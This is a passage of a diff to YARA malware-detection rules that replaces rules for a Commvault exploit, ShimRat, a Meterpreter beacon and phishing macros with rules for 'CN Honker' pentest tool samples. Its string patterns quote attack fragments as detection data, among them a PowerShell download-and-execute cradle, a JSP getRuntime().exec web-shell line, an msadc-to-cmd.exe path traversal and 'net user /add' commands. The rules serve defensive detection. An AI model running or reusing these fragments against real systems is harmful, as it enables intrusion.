+		$s3 = "select  * from  Results order by scandate desc" fullword wide
 
 	condition:
-		not uint16( 0 ) == 0x5a4d and filesize < 20MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Aug25_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Invasionerasor : FILE
 {
 	meta:
-		description = "Detects potential exploit for WT-2025-0050, authentication bypass through QCommand argument injection"
-		author = "X__Junior"
-		id = "0a47c475-4ff4-5230-a9a6-49ee2b5aaf86"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L16-L28"
+		description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2128-L2146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "61e3ddc09157badb2a1abf30da2cc35cac1a723db1134a37cb667be78209b845"
-		score = 65
+		hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
+		logic_hash = "d2f742693682e9409284706a3eb63536a576cb162629bf76bfabf2e0210984a3"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "_localadmin__"
-		$sa2 = "-localadmin" base64
+		$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide
+		$s2 = "c:\\winnt\\*.txt" fullword wide
+		$s3 = "Command1" fullword ascii
+		$s4 = "Win2003" fullword ascii
+		$s5 = "Win 2000" fullword ascii
 
 	condition:
-		filesize < 20MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_Commvault_CVE_2025_57791_Artifact_Aug25 : FILE
+rule SIGNATURE_BASE_CN_Honker_Super_Injection1 : FILE
 {
 	meta:
-		description = "Detects exploit artifact for WT-2025-0050, authentication bypass through QCommand argument injection"
-		author = "X__Junior"
-		id = "91f3d726-e856-54f1-846f-8b83e09dd53c"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L30-L45"
+		description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2148-L2164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a3f57509dc7e986fd6d00204deb5baec815e04e0e140a7751bab8ce18e8da62"
-		score = 75
-		quality = 35
+		hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
+		logic_hash = "11a3628b7c34a34dc37604430195e24063d3f0dd0889d6d782ce0ee42cafbb02"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "_localadmin__"
-		$sa2 = /-cs [a-zA-Z0-9-{}]{3,32} -cs /
-		$sb2 = "-localadmin" base64
-		$sb1 = "-localadmin"
+		$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "ScanInject.log" fullword ascii
 
 	condition:
-		filesize < 20MB and all of ( $sa* ) and 1 of ( $sb* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_JSP_Commvault_CVE_2025_57791_Aug25_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Pk_Pker : FILE
 {
 	meta:
-		description = "Detects potential exploit for WT-2025-0049, Post-Auth RCE with QCommand Path Traversal"
-		author = "X__Junior"
-		id = "73b1bab0-1206-55b3-a6cf-51742a9ce67f"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L47-L59"
+		description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2166-L2186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "359b35ced874244901f64bc09456cfec7079421ef6bab58ea95a3b1887ecc858"
-		score = 75
+		hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
+		logic_hash = "ea29bc82131751f0aaa4f10cc7576a27d243fb7dade03db7ae3dcb029b306505"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<App_GetUserPropertiesResponse>" ascii
-		$s2 = "getMethod('getRuntime').invoke(null).exec(param.cmd)" ascii
+		$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide
+		$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide
+		$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide
+		$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide
+		$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
+		$s6 = "Report.dat" fullword wide
+		$s7 = ".\\Report.dat" fullword wide
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them
 }
-rule SIGNATURE_BASE_EXPL_JSP_Commvault_CVE_2025_57791_Aug25_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Getpass_Getpass : FILE
 {
 	meta:
-		description = "Detects potential exploit for WT-2025-0049, Post-Auth RCE with QCommand Path Traversal"
-		author = "X__Junior"
-		id = "facbe0e9-6fe6-5d90-87bc-2696f471dcb5"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L61-L74"
+		description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2188-L2204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3375a33556a9b479f0c170de6e06c80ab0277f1356e4ac44bfe51d6a65a578fe"
-		score = 75
+		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
+		logic_hash = "90d802da512f5d460eda6d644660711601d361e2402522d085d3225931a3fca3"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<App_UpdateUserPropertiesRequest>" ascii
-		$s2 = "<description>" ascii
-		$s3 = "getMethod('getRuntime').invoke(null).exec(param.cmd)" ascii
+		$s1 = "\\only\\Desktop\\" ascii
+		$s2 = "To Run As Administuor" ascii
+		$s3 = "Key to EXIT ... & pause > nul" fullword ascii
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Commvault_CVE_2025_57791_Indicator_Shell_Drop_Aug25
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_Blackmoon_Jun15 : FILE
 {
 	meta:
-		description = "Detects suspicious log lines that indicate web shell drops into the Apache root folder of a Commvault installation"
-		author = "Florian Roth"
-		id = "1c4e9992-79de-557e-ace6-3d6916023359"
-		date = "2025-08-21"
-		modified = "2025-08-21"
-		reference = "https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_commvault_cve_2025_57791.yar#L76-L87"
+		description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "df12daca-8e03-5382-b71d-96a747d3a043"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2206-L2227"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f0e9fedba803b0cd8b1469bad7a50bf4647f7e2f786520caf5a79ac626879125"
+		hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
+		logic_hash = "85db31c6bca6e5ddd45168a3adbc382d5a9e8128e0b2a6ed5efe1a2fcd42ff3d"
 		score = 70
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = /Results written to \[[C-Z]:\\Program Files\\Commvault\\ContentStore\\Apache\\webapps\\ROOT\\[^\\]{1,20}\.jsp\]/
+		$s1 = "File UserName PassWord [comment] /add" fullword ascii
+		$s2 = "No Net.exe Add User" fullword ascii
+		$s3 = "BlackMoon RunTime Error:" fullword ascii
+		$s4 = "Team.F4ck.Net" fullword wide
+		$s5 = "admin 123456789" fullword ascii
+		$s6 = "blackmoon" fullword ascii
+		$s7 = "f4ck Team" fullword wide
 
 	condition:
-		$xr1
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-rule SIGNATURE_BASE_Shimrat
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_3 : FILE
 {
 	meta:
-		description = "Detects ShimRat and the ShimRat loader"
-		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
-		id = "21431895-1180-5552-8e82-1589992ffa1d"
-		date = "2015-11-20"
+		description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1767669f-47d0-5d6e-97a5-92522f988102"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mofang.yar#L1-L26"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2229-L2248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0dd19e6a65b06bd5846ec224f01c3feea066540317223d1991154b2305882b20"
-		score = 75
+		hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
+		logic_hash = "870d22be85da127b3ebfd3f8ec547b6ad1cdc8048b56aea494e8d2643bd61d77"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dll = ".dll"
-		$dat = ".dat"
-		$headersig = "QWERTYUIOPLKJHG"
-		$datasig = "MNBVCXZLKJHGFDS"
-		$datamarker1 = "Data$$00"
-		$datamarker2 = "Data$$01%c%sData"
-		$cmdlineformat = "ping localhost -n 9 /c %s > nul"
-		$demoproject_keyword1 = "Demo"
-		$demoproject_keyword2 = "Win32App"
-		$comspec = "COMSPEC"
-		$shim_func1 = "ShimMain"
-		$shim_func2 = "NotifyShims"
-		$shim_func3 = "GetHookAPIs"
+		$s1 = "F4ck.exe" fullword wide
+		$s2 = "@Netapi32.dll" fullword ascii
+		$s3 = "Team.F4ck.Net" fullword wide
+		$s6 = "NO Net Add User" fullword wide
+		$s7 = "DLL ERROR" fullword ascii
+		$s11 = "F4ck Team" fullword wide
 
 	condition:
-		($dll and $dat and $headersig and $datasig ) or ( $datamarker1 and $datamarker2 ) or ( $cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec ) or ( $dll and $dat and $shim_func1 and $shim_func2 and $shim_func3 )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_Shimratreporter
+rule SIGNATURE_BASE_CN_Honker_ACCESS_Brute : FILE
 {
 	meta:
-		description = "Detects ShimRatReporter"
-		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
-		id = "01688b3c-2f06-518f-939d-4d65529be5ae"
-		date = "2015-11-20"
+		description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mofang.yar#L28-L49"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2250-L2268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "931d65628e5f0b7c63fe270b0a6cd3890f41a4ee7e253ce056b37f2d55542258"
-		score = 75
+		hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
+		logic_hash = "5bd0cbb1c2f5863ef1365dc115c736ade05c290cd6fa09a24c2d344314b522cb"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$IpInfo = "IP-INFO"
-		$NetworkInfo = "Network-INFO"
-		$OsInfo = "OS-INFO"
-		$ProcessInfo = "Process-INFO"
-		$BrowserInfo = "Browser-INFO"
-		$QueryUserInfo = "QueryUser-INFO"
-		$UsersInfo = "Users-INFO"
-		$SoftwareInfo = "Software-INFO"
-		$AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
-		$proxy_str = "(from environment) = %s"
-		$netuserfun = "NetUserEnum"
-		$networkparams = "GetNetworkParams"
+		$s1 = ".dns166.co" ascii
+		$s2 = "SExecuteA" ascii
+		$s3 = "ality/clsCom" ascii
+		$s4 = "NT_SINK_AddRef" ascii
+		$s5 = "WINDOWS\\Syswm" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_VULN_Erlang_OTP_SSH_CVE_2025_32433_Apr25 : CVE_2025_32433 FILE
+rule SIGNATURE_BASE_CN_Honker_Fpipe_Fpipe : FILE
 {
 	meta:
-		description = "Detects binaries vulnerable to CVE-2025-32433 in Erlang/OTP SSH"
-		author = "Pierre-Henri Pezier, Florian Roth"
-		id = "2a149d28-9dba-546d-abfe-79c0ced34b12"
-		date = "2025-04-18"
-		modified = "2025-04-28"
-		reference = "https://www.upwind.io/feed/cve-2025-32433-critical-erlang-otp-ssh-vulnerability-cvss-10"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_erlang_otp_ssh_cve_2025_32433.yar#L1-L22"
+		description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2270-L2286"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77d23956bd467a6eb56a91fa7a4bd939873363cd101a9d21b5b298c7b2e6c1ec"
-		score = 60
+		hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
+		logic_hash = "bde46f2508dc82f91e39cc7bd88960e836522b068546ce65ebc07db69b3d4493"
+		score = 50
 		quality = 85
-		tags = "CVE-2025-32433, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = { 46 4F 52 31 ?? ?? ?? ?? 42 45 41 4D }
-		$s1 = "ssh_connection.erl"
-		$fix1 = "chars_limit"
-		$fix2 = "allow    macro_log"
-		$fix3 = "logger"
-		$fix4 = "max_log_item_len"
+		$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii
+		$s2 = "http://www.foundstone.com" fullword ascii
+		$s3 = "%s %s port %d. Address is already in use" fullword ascii
 
 	condition:
-		filesize < 1MB and $a1 at 0 and $s1 and not 1 of ( $fix* )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Beacon_K5Om : FILE
+rule SIGNATURE_BASE_CN_Honker_Layer_Layer : FILE
 {
 	meta:
-		description = "Detects Meterpreter Beacon - file K5om.dll"
+		description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9354d20a-d798-55bf-a735-820f21d4a861"
-		date = "2017-06-07"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L10-L30"
+		id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2288-L2305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b1ec0fc6c0ad4e76c526f7568153bca62f9bffdd38a3b1eaa51a37a1dcab226"
-		score = 75
+		hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
+		logic_hash = "03e2d875de6dc45a0cede55071c071944c4cdf4610f52fe4a21f6dd5dedac41d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
 
 	strings:
-		$x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
-		$s1 = "Could not open process token: %d (%u)" fullword ascii
-		$s2 = "0fd00b.dll" fullword ascii
-		$s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
-		$s4 = "Could not connect to pipe (%s): %d" fullword ascii
+		$s1 = "\\Release\\Layer.pdb" ascii
+		$s2 = "Layer.exe" fullword wide
+		$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_FE_LEGALSTRIKE_MACRO
+rule SIGNATURE_BASE_CN_Honker_Ms10048_X86 : FILE
 {
 	meta:
-		description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
-		author = "Ian.Ahl@fireeye.com @TekDefense - modified by Florian Roth"
-		id = "eb15e5aa-16e5-5c07-a293-ad15c0c09d8e"
-		date = "2017-06-02"
+		description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L34-L50"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2307-L2321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b38edeedcc02168d3ba7e82c3f5c6963ffc8ce1688eeb424ce686484f3687512"
-		score = 75
+		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
+		logic_hash = "2f67b3be31b1d1eb420b40ec291db7271acd692af9f061d5db17415685cf7546"
+		score = 70
 		quality = 85
-		tags = ""
-		version = ".1"
-		filetype = "MACRO"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
-		$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
-		$wsobj2 = "Obj.Run " ascii wide
+		$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_FE_LEGALSTRIKE_RTF : FILE
+rule SIGNATURE_BASE_CN_Honker_Htran2_4 : FILE
 {
 	meta:
-		description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
-		author = "joshua.kim@FireEye. - modified by Florian Roth"
-		id = "b62ceffa-445f-517e-b86b-56e47876c6c0"
-		date = "2017-06-02"
+		description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt19.yar#L52-L69"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2323-L2338"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "af811694076f7d53ee76713538839c4ec82c591518d59d5988dcb893bfd32ffe"
-		score = 75
+		hash = "524f986692f55620013ab5a06bf942382e64d38a"
+		logic_hash = "dd1332d3dca12513b1f8a1d10148f6fa2eb7cc809ac7cf6f4dcc9090746718b5"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		version = ".1"
-		filetype = "MACRO"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$lnkinfo = "4c0069006e006b0049006e0066006f"
-		$encoded1 = "4f4c45324c696e6b"
-		$encoded2 = "52006f006f007400200045006e007400720079"
-		$encoded3 = "4f0062006a0049006e0066006f"
-		$encoded4 = "4f006c0065"
-		$datastore = "\\*\\datastore"
+		$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+		$s2 = "[+] New connection %s:%d !!" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Zoho_RCE_Fix_Lines_Dec21_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Skinhrootkit_Skinh : FILE
 {
 	meta:
-		description = "Detects lines in log lines of Zoho products that indicate RCE fixes (silent removal of evidence)"
+		description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "633287e3-a377-5b3c-8520-a7790168eff5"
-		date = "2021-12-06"
+		id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1467784104930385923"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_zoho_rcef_logs.yar#L2-L27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2340-L2356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e6d9c3364da57c03a5e838f485deefabec2f3ec67d19a9017e564ba702a72d03"
-		score = 65
+		hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
+		logic_hash = "97314a8c908c714c39ea8962c87709fdc422c3e2998a2b1694950fa127204335"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "RCEF="
-		$sa1 = "\"attackStatus\"\\:\"active\""
-		$sa2 = "\"attackStatus\":\"active\""
-		$sd1 = "deletedCount"
-		$sd_fp1 = "\"deletedCount\"\\:0"
-		$sd_fp2 = "\"deletedCount\":0"
+		$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
+		$s1 = "SDVersion.dll" fullword wide
+		$s2 = "skinh.dll" fullword ascii
 
 	condition:
-		filesize < 6MB and $s1 and ( 1 of ( $sa* ) or ( $sd1 and not 1 of ( $sd_fp* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_APT_PY_Bluelight_Loader : INKYSQUID
+rule SIGNATURE_BASE_CN_Honker__Postgresql_Mysql_Injectv1_1_Creak_Oracle_Sqlserver_Inject_Creaked : FILE
 {
 	meta:
-		description = "Python Loader used to execute the BLUELIGHT malware family."
-		author = "threatintel@volexity.com"
-		id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd"
-		date = "2021-06-22"
+		description = "Sample from CN Honker Pentest Toolset"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0272776c-8dbe-5345-92c8-57593686a84c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_inkysquid.yar#L39-L58"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2358-L2378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
